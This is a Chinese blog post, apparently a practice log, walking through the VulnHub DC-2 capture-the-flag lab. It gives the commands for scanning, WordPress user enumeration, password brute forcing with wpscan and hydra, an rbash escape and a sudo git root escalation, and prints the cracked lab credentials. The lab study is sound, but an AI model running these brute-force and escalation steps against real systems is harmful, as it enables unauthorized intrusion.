Vulnhub-DC2-练习记录

3 篇文章 0 订阅
2 篇文章 0 订阅

001环境和目的

靶机下载地址:DC: 2 ~ VulnHub

攻击机:kali2022 192.168.200.129

DC2:192.168.200.11

目的:拿到5个flag

002信息收集

1由于是黑盒测试,我们根据mac地址确定目标ip

命令:arp-scan -l

2我们确定ip是192.168.200.11

nmap扫描 nmap -A 192.168.200.11 -p 1-65535

3扫描到了此ip开放了80和7744端口

我们访问80端口先进网站看一下

访问不了,此时我们看到url中是域名,由此判断应该是dns没有解析出来

这边配置一下hosts文件

vim /etc/hosts

添加192.168.200.11 dc-2

保存退出

 

已经可以成功访问了,我们在网站里面看一下都有什么

 flag1就放在网站里面,我们来看一下flag1给的线索

这里的话我去百度了一下cewl

Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外,Cewl还提供了命令行工具。

Kali Linux字典生成工具Cewl使用全指南 - FreeBuf网络安全行业门户

贴一下使用指南

输入  cewl -h   查看

 我们创建一下字典

 这里就创建好了,生成字典后我们肯定是要爆破后台的,我们开始目录扫描

这里我发现网站使用wordpress搭建的 

WordPress_百度百科

目录扫描的工具非常多由于是wordpress搭建的我这里就用wpscan来扫描目录

既然是爆破那么我们就在参数中设置号账号

wpscan --url dc-2 -e u

这里也是成功扫描到了3个账号

创建一个username存放这3个账号

admin                 jerry                            tom

密码在之前也用cewl生成好了

后台也扫了出来gobuster dir -u http://192.168.200.11:80/ -w /usr/share/wordlists/dirb/common.txt

 /wp-admin

开始爆破

wpscan --url dc-2 -U username.txt -P pwn.dic

 Username: jerry, Password: adipiscing
 |Username: tom, Password: parturient

我们在jreey这个账户中找到了flag2 

提示让我们找下一个切入点

我们这是回到开始还有一个端口7744(ssh)应该是让我们爆破

爆破ssh

hydra -L username.txt -P pwn.dic -vV 192.168.200.11  -s 7744 ssh 

host: 192.168.200.11   login: tom   password: parturient
 ssh tom@192.168.200.11 -p 7744

连接

 

发现了flag3但是没办法用cat             

 搜了一下需要绕过rbash

BASH_CMDS[a]=/bin/bash
a
/bin/bash
export PATH=PATH:/sbin:/bin
 

 这里应该是跟jerry有关在文件里面找一下

flag4到手

这里也是提示我们git--git提权         同时也让我们快离开

这里尝试切换用户为jerry

 开始git提取

sudo git -p --help
!/bin/bash

到root目录下发现最后一个flag

 练习记录----

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值